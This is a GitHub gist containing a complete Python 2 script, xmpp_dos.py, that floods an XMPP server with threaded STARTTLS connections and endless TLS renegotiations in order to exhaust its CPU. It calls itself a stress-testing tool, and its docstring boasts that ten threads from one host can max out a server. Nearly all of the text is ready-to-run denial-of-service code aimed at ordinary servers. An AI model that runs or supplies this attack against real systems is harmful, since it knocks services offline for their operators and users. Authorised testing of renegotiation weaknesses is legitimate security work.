Skip to content

Instantly share code, notes, and snippets.

@bitrot-sh
Created December 12, 2017 20:44
Show Gist options
  • Save bitrot-sh/21b88f32f9c3328fc279c5ba3ae48312 to your computer and use it in GitHub Desktop.
Save bitrot-sh/21b88f32f9c3328fc279c5ba3ae48312 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python2
"""
This tool is written as a stress testing tool to identify vulnerable servers.
Use the tool legally and responsibly.
Example: ./xmpp_dos.py localhost 5222 -t 10
A single host with 10 threads can often max out server CPUs.
"""
from __future__ import print_function
from socket import socket, AF_INET, SOCK_STREAM
from sys import exit
from time import sleep
from optparse import OptionParser
from nassl import TLSV1, SSL_VERIFY_NONE
from nassl.DebugSslClient import DebugSslClient
import threading
XMPP_OPEN_STREAM = ("<stream:stream xmlns='jabber:client' xmlns:stream='"
"http://etherx.jabber.org/streams' xmlns:tls='http://www.ietf.org/rfc/"
"rfc2595.txt' to='{0}' xml:lang='en' version='1.0'>" )
XMPP_STARTTLS = "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
class SSLThread(threading.Thread):
def __init__(self, tid, host, port):
threading.Thread.__init__(self)
self.tid = tid
self.host = host
self.port = port
self.sock = None
self.ssl = None
def run(self):
self.reconnect()
self.renegotiate()
def connect(self):
print("[+] Thread %d: Connecting" % self.tid)
self.sock = socket(AF_INET, SOCK_STREAM)
self.sock.settimeout(5)
self.sock.connect((self.host, self.port))
def starttls(self):
self.sock.send(XMPP_OPEN_STREAM.format(self.host))
resp = self.sock.recv(4096)
if '<stream:error>' in resp:
print("[!] Error connecting to %s:%d" % (self.host, self.port))
exit(1)
elif '</stream:features>' not in resp:
self.sock.recv(4096)
self.sock.send(XMPP_STARTTLS)
resp = self.sock.recv(2048)
def negotiate(self):
self.ssl = DebugSslClient(sslVersion=TLSV1, sock=self.sock, sslVerify=SSL_VERIFY_NONE)
self.ssl.do_handshake()
def reconnect(self):
self.connect()
self.starttls()
self.negotiate()
def renegotiate(self):
while 1:
try:
self.ssl.do_renegotiate()
except Exception:
self.reconnect()
def main():
print("[+] XMPP SSL/TLS renegotiation stress testing tool")
usage = "usage: %prog [options] host port"
parser = OptionParser(usage=usage)
parser.add_option("-t", "--threads", dest="threads", help="Number of threads", default=5)
(options, args) = parser.parse_args()
num_threads = int(options.threads)
if len(args) != 2:
parser.print_usage()
exit(1)
host = args[0]
try:
port = int(args[1])
except ValueError:
print("[!] Invalid port %s" % str(args[1]))
exit(1)
threads = []
for x in xrange(0, num_threads):
threads.append(SSLThread(x, host, port))
threads[x].daemon = True
threads[x].start()
try:
while True:
sleep(100)
except (KeyboardInterrupt, SystemExit):
print("[+] Stopping threads!")
exit(0)
if __name__=='__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment